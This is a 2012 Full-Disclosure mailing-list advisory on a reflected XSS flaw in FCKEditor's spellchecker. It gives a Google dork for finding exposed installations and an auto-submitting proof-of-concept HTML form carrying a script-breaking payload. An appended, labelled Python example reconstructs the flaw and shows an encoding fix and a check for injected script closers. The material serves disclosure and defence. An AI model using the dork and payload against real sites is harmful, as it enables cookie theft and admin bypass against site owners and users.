Message-ID: <CAHPiOv_c=-4oybkLF-_e5cCai3PmfmK-8CrgN1AaTy5h+d_EaA@mail.gmail.com>
Date: Fri, 22 Jun 2012 12:13:17 +0200
From: Emilio Pinna <ncl01@...il.it>
To: full-disclosure@...ts.grok.org.uk
Subject: FCKEditor reflected XSS vulnerability

# Product: FCKEditor
# Vendor site: http://ckeditor.com/
# Affected versions:  FCKEditor <= 2.6.7
# Product description: WYSIWYG Text and HTML Editor for the Web
# Author: Emilio Pinna - ncl 01 _at_ email _dot_ it
# Blog site: http://disse.cting.org
# Date: 13/06/2012

This software is popular as a stand-alone application, as a WordPress/Joomla/Drupal extension, and as an editor embedded in web applications. Development was discontinued in 2009, but the editor had spread for more than six years and Google counts more than 1.5 billion results.

A plausible Google dork filtering out PHP sources could be:

# inurl:fck_spellerpages/spellerpages/server-scripts/ -"The following variables"


File "spellchecker.php" suffers from an XSS vulnerability at line 27. Attackers can exploit this weakness to execute arbitrary HTML and script code in the browser session of a user who visits the resulting page, leading to cookie theft and bypass of admin access controls. The exploit is CSRF-like, because the vulnerable parameter is sent via POST.

#--------- File: fsck_editor.html -----------#
<html>
<body>
<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
  <form method="post" name="sender"
   action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
   target="hidden">
   <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' />
  </form>
</body>
<script>document.sender.submit(); </script>
</html>
#-----------------------------------------------------#
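An added example, not code from the advisory or from FCKEditor, showing the defect class and its fix in Python as a stand-in for the PHP: render_unsafe is a hypothetical reconstruction (an assumption, not the project's real line 27) of interpolating a POST value into a JavaScript string literal inside <script>, and js_string is the encoding that keeps the advisory's payload inert (in PHP the equivalent is json_encode with the JSON_HEX_TAG/JSON_HEX_AMP flags).

```python
import json

# Constructed from the PoC form above: the value closes the JS string literal,
# closes the <script> element and then opens its own script context.
PAYLOAD = '");alert("THIS SITE IS XSS VULNERABLE!");</script><!--'


def render_unsafe(textinputs):
    """Hypothetical reconstruction of the vulnerable pattern: each POST value
    is pasted verbatim into a JavaScript string literal inside <script>."""
    lines = ['textinputs[%d] = "%s";' % (i, v) for i, v in enumerate(textinputs)]
    return "<script>\n" + "\n".join(lines) + "\n</script>"


def js_string(value):
    """Encode a value as a JavaScript string literal that is safe inside an
    HTML <script> block. json.dumps escapes quotes, backslashes and control
    characters; the extra replacements turn <, > and & into \\uXXXX escapes so
    '</script' and '<!--' can never appear in the output and the HTML parser
    cannot end the script element early."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_safe(textinputs):
    """Same output shape as render_unsafe, with every value encoded."""
    lines = ["textinputs[%d] = %s;" % (i, js_string(v)) for i, v in enumerate(textinputs)]
    return "<script>\n" + "\n".join(lines) + "\n</script>"


def script_closers(rendered):
    """Detection aid: count how many times the script element gets closed.
    The intended page has exactly one closer; a second one means an injected
    value escaped its string context."""
    return rendered.lower().count("</script>")


if __name__ == "__main__":
    print(render_unsafe([PAYLOAD]))   # two </script> closers: injection succeeded
    print(render_safe([PAYLOAD]))     # one closer: payload is inert data
```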

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
